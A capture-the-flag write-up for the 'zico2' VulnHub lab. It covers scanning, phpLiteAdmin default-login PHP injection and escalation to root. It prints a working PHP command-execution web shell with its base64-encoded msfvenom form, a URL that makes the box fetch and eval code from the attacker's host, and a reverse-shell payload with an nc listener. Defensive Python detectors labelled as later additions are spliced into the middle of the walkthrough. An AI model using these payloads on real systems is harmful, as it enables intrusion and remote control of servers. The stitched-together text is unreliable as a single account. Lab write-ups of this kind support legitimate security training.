After loading the VM into VMware, I scanned it with nmap. Port 80, as usual, appeared to be the most interesting, so I fired up nikto and then dirsearch, in that order.
root@kali:/tmp# nmap -sT -A -PO -n -v 192.168.83.133
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-09 09:39 EDT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:40
Completed NSE at 09:40, 0.00s elapsed
Initiating NSE at 09:40
Completed NSE at 09:40, 0.00s elapsed
Initiating ARP Ping Scan at 09:40
Scanning 192.168.83.133 [1 port]
Completed ARP Ping Scan at 09:40, 0.22s elapsed (1 total hosts)
Initiating Connect Scan at 09:40
Scanning 192.168.83.133 [1000 ports]
Discovered open port 22/tcp on 192.168.83.133
Discovered open port 80/tcp on 192.168.83.133
Discovered open port 111/tcp on 192.168.83.133
Completed Connect Scan at 09:40, 0.03s elapsed (1000 total ports)
Initiating Service scan at 09:40
Scanning 3 services on 192.168.83.133
Completed Service scan at 09:40, 6.15s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.83.133
adjust_timeouts2: packet supposedly had rtt of -175891 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -175891 microseconds. Ignoring time.
NSE: Script scanning 192.168.83.133.
Initiating NSE at 09:40
Completed NSE at 09:40, 0.29s elapsed
Initiating NSE at 09:40
Completed NSE at 09:40, 0.01s elapsed
Nmap scan report for 192.168.83.133
Host is up (0.00053s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_ 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Zico's Shop
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 35817/udp status
|_ 100024 1 49910/tcp status
MAC Address: 00:0C:29:A2:5A:63 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Uptime guess: 198.046 days (since Sat Mar 25 08:33:47 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.53 ms 192.168.83.133
NSE: Script Post-scanning.
Initiating NSE at 09:40
Completed NSE at 09:40, 0.00s elapsed
Initiating NSE at 09:40
Completed NSE at 09:40, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.23 seconds
Raw packets sent: 36 (2.850KB) | Rcvd: 32 (2.322KB)
root@kali:~/dirsearch# nikto -h http://192.168.83.133
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.83.133
+ Target Hostname: 192.168.83.133
+ Target Port: 80
+ Start Time: 2017-10-09 09:40:28 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 3803593, size: 7970, mtime: Thu Jun 8 15:18:30 2017
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.26
+ 8346 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2017-10-09 09:40:49 (GMT-4) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~/dirsearch# ./dirsearch.py -u http://192.168.83.133/ -e php
_|. _ _ _ _ _ _|_ v0.3.7
(_||| _) (/_(_|| (_| )
Extensions: php | Threads: 10 | Wordlist size: 5992
Error Log: /root/dirsearch/logs/errors-17-10-09_09-50-00.log
Target: http://192.168.83.133/
[09:50:00] Starting:
[09:50:02] 403 - 286B - /.hta
[09:50:02] 403 - 293B - /.ht_wsr.txt
[09:50:02] 403 - 297B - /.htaccess-local
[09:50:02] 403 - 295B - /.htaccess-dev
[09:50:02] 403 - 295B - /.htaccess.BAK
[09:50:02] 403 - 297B - /.htaccess-marco
[09:50:02] 403 - 295B - /.htaccess.old
[09:50:02] 403 - 296B - /.htaccess.bak1
[09:50:02] 403 - 298B - /.htaccess.sample
[09:50:02] 403 - 296B - /.htaccess.orig
[09:50:02] 403 - 296B - /.htaccess.save
[09:50:02] 403 - 295B - /.htaccess.txt
[09:50:02] 403 - 297B - /.htaccess_extra
[09:50:02] 403 - 296B - /.htaccess_orig
[09:50:02] 403 - 294B - /.htaccessBAK
[09:50:02] 403 - 295B - /.htaccessOLD2
[09:50:02] 403 - 294B - /.htaccessOLD
[09:50:03] 403 - 294B - /.htaccess_sc
[09:50:03] 403 - 292B - /.htaccess~
[09:50:03] 403 - 290B - /.htgroup
[09:50:03] 403 - 295B - /.htpasswd-old
[09:50:03] 403 - 296B - /.htpasswd_test
[09:50:03] 403 - 290B - /.htusers
[09:50:03] 403 - 292B - /.htpasswds
[09:50:18] 403 - 290B - /cgi-bin/
[09:50:21] 301 - 314B - /css -> http://192.168.83.133/css/
[09:50:21] 301 - 318B - /dbadmin -> http://192.168.83.133/dbadmin/
[09:50:21] 200 - 917B - /dbadmin/
[09:50:22] 403 - 286B - /doc/
[09:50:22] 403 - 301B - /doc/en/changes.html
[09:50:22] 403 - 300B - /doc/stable.version
[09:50:24] 200 - 3KB - /gulpfile.js
[09:50:25] 301 - 314B - /img -> http://192.168.83.133/img/
[09:50:25] 200 - 8KB - /index
[09:50:26] 200 - 8KB - /index.html
[09:50:27] 301 - 313B - /js -> http://192.168.83.133/js/
[09:50:27] 200 - 1KB - /LICENSE
[09:50:34] 200 - 789B - /package.json
[09:50:34] 200 - 789B - /package
[09:50:38] 200 - 1KB - /README.md
[09:50:40] 403 - 295B - /server-status
[09:50:40] 403 - 296B - /server-status/
[09:50:44] 200 - 8KB - /tools
[09:50:45] 200 - 0B - /view.php
Task Completed
The dbadmin folder obviously looked the most interesting, so I quickly browsed it. This in turn led me to http://192.168.83.133/dbadmin/test_db.php. At the prompt I logged in with the default credentials of admin. I then searched for existing vulnerabilities in phpliteadmin.
At this point I tried to follow along with what the advisory said, but was a little handicapped since the screenshots were no longer up.
The screenshots below show how I managed to execute code on the zico2 box.
Click "Go"
Fill in the fields as shown in the screenshot (under the Default Value field put <?php phpinfo()?>, as in the advisory), then click "Create".
You should be greeted with a message showing that the table was successfully created, as in the screenshot below.
After that, click on "/usr/databases/test.php", then click the "Rename Database" tab.
I chose that folder (dbadmin) since that's the location of the default test_db.php file.
At this point, browsing to http://192.168.83.133/dbadmin/west.php should display the phpinfo page, as in the screenshot below.
Now we know we have code execution. The next step is to upload something more evil, like a command shell. When I directly uploaded a command shell it didn't work, so I base64 encoded it.
The steps for uploading are the same as above, with the small difference of base64 encoding it.
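From the defender's side, the artifact the rename step above leaves behind is a SQLite database that Apache will hand to mod_php because of its extension. The following is an added example (not code from the original post) that walks a web root for exactly that: files with a PHP extension whose first bytes are the SQLite 3 header, and extracts any PHP tags stored inside them. The extension list and the default root of /var/www are assumptions.

```python
# Added example (not from the original post): find files under a web root that
# carry a PHP-handled extension but begin with the SQLite 3 file header, which is
# what the "rename the database to <name>.php" step above leaves behind.
import os
import sys

SQLITE_MAGIC = b"SQLite format 3\x00"          # first 16 bytes of every SQLite 3 file
PHP_EXTS = (".php", ".phtml", ".php5")         # assumption: extensions mod_php executes here

def looks_like_planted_db(name, head):
    """True when `name` has a PHP extension and `head` starts with the SQLite magic."""
    return name.lower().endswith(PHP_EXTS) and head.startswith(SQLITE_MAGIC)

def embedded_php_tags(data):
    """Return every <?php ... ?> fragment stored inside the bytes (e.g. a column default)."""
    frags, start = [], 0
    while True:
        i = data.find(b"<?php", start)
        if i < 0:
            return frags
        j = data.find(b"?>", i)
        j = len(data) if j < 0 else j + 2
        frags.append(data[i:j].decode("latin-1"))
        start = j

def scan_webroot(root):
    """Walk `root`; return [(path, [php fragments])] for each planted database file."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue
            if looks_like_planted_db(name, data[:len(SQLITE_MAGIC)]):
                hits.append((path, embedded_php_tags(data)))
    return hits

if __name__ == "__main__":
    for path, frags in scan_webroot(sys.argv[1] if len(sys.argv) > 1 else "/var/www"):
        print("planted SQLite-as-PHP file:", path, frags)
```

Run it against the document root (here that would include /dbadmin); a legitimate phpliteadmin install keeps its databases outside the web root or with a non-PHP extension, so any hit deserves a look.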
root@kali:/tmp# cp /usr/share/webshells/php/simple-backdoor.php .
Modify it and remove the PHP tags so it looks like the following.
root@kali:/tmp# cat simple-backdoor.php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
Now base64 encode it.
root@kali:/tmp# msfvenom -p generic/custom -e php/base64 -f raw PAYLOADFILE=simple-backdoor.php
No platform was selected, choosing Msf::Module::Platform from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 226 (iteration=0)
php/base64 chosen with final size 226
Payload size: 226 bytes
eval(base64_decode(aWYoaXNzZXQoJF9SRVFVRVNUWydjbWQnXSkpewogICAgICAgIGVjaG8gIjxwcmU.chr(43).IjsKICAgICAgICAkY21kID0gKCRfUkVRVUVTVFsnY21kJ10pOwogICAgICAgIHN5c3RlbSgkY21kKTsKICAgICAgICBlY2hvICI8L3ByZT4iOwogICAgICAgIGRpZTsKfQoK));
Paste the resulting code into the default value field.
<?php <base64 encoded code goes here without the angle brackets :-)> ?>
As before, rename the database to whatever you like; I named mine bd.php. We should now have a functional shell.
However, this shell is a little limited, so we'll use Metasploit to get a better shell.
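The msfvenom output above is also a useful signature for anyone hunting for this kind of upload: the encoder wraps the shell in eval(base64_decode(...)) and splices out characters like '+' as .chr(43). so they survive the form field. The following added example (not the post's or Metasploit's own code) undoes that wrapping and flags decoded blobs that call command-execution functions. The encode_like_msfvenom helper is a constructed stand-in for the encoder, assumed to splice '+', '/' and '=' as .chr(43)., .chr(47). and .chr(61)., included only so the detector can be exercised offline.

```python
# Added example (not the post's or Metasploit's own code): decode eval(base64_decode(...))
# blobs found in PHP files, including the `.chr(43).` splices that msfvenom's
# php/base64 encoder emits in place of '+' (see the output above), and flag the
# decoded source if it calls a command-execution function.
import base64
import re

EVAL_B64 = re.compile(r"eval\s*\(\s*base64_decode\s*\((.+?)\)\s*\)", re.S)
CHR_SPLICE = re.compile(r"\.?chr\((\d+)\)\.?")
DANGEROUS = ("system(", "exec(", "shell_exec(", "passthru(", "popen(", "proc_open(")

def unsplice(arg):
    """Turn `abc.chr(43).def` back into `abc+def` and drop any surrounding quotes."""
    arg = arg.strip().strip("'\"")
    return CHR_SPLICE.sub(lambda m: chr(int(m.group(1))), arg)

def decode_blobs(php_src):
    """Return the decoded text of every eval(base64_decode(...)) argument in php_src."""
    decoded = []
    for m in EVAL_B64.finditer(php_src):
        b64 = unsplice(m.group(1))
        b64 += "=" * (-len(b64) % 4)        # tolerate stripped padding
        try:
            decoded.append(base64.b64decode(b64, validate=True).decode("utf-8", "replace"))
        except ValueError:                  # not really base64: skip it
            continue
    return decoded

def analyze(php_src):
    """Return [(decoded source, [dangerous calls it contains])] for each blob."""
    return [(src, [d for d in DANGEROUS if d in src]) for src in decode_blobs(php_src)]

def encode_like_msfvenom(php_src):
    """Constructed stand-in for the php/base64 encoder (assumption: it splices '+', '/'
    and '=' as .chr(43)., .chr(47). and .chr(61).) so the detector can be exercised offline."""
    b64 = base64.b64encode(php_src.encode()).decode()
    for ch in "+/=":
        b64 = b64.replace(ch, ".chr(%d)." % ord(ch))
    return "eval(base64_decode(%s));" % b64

if __name__ == "__main__":
    # Constructed sample: a harmless snippet that still calls system().
    sample = encode_like_msfvenom("echo 1; system('uptime');")
    for src, hits in analyze(sample):
        print("decoded:", src, "| dangerous calls:", hits)
```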
http://192.168.83.133/dbadmin/bd.php?cmd=php%20-d%20allow_url_fopen=true%20-r%20%22eval%28file_get_contents%28%27http://192.168.83.175:8081/RwdifigI%27%29%29;%22
#I didn't like this shell as well since it kept dying on me.
root@kali:/tmp# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.83.175 LPORT=9999 EXITFUNC=thread -a x64 -f elf -o shell9999.elf
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: shell9999.elf
root@kali:/tmp# file shell9999.elf
shell9999.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, corrupted section header size
root@kali:/tmp# cp shell9999.elf /var/www/html/
root@kali:/tmp# nc -lvp 9999
listening on [any] 9999 ...
I downloaded the Linux exploit suggester onto the system, and the first exploit did the trick. gcc wasn't working well on the victim box, so I compiled the exploit on another box, then returned it to the victim box, which gave me a root shell.
Finally, I browsed to the root folder and read the flat.txt file. At this point I was obliged to do the rewt dance :-)
Thanks to Rafael and the team over at vulnhub for the challenges.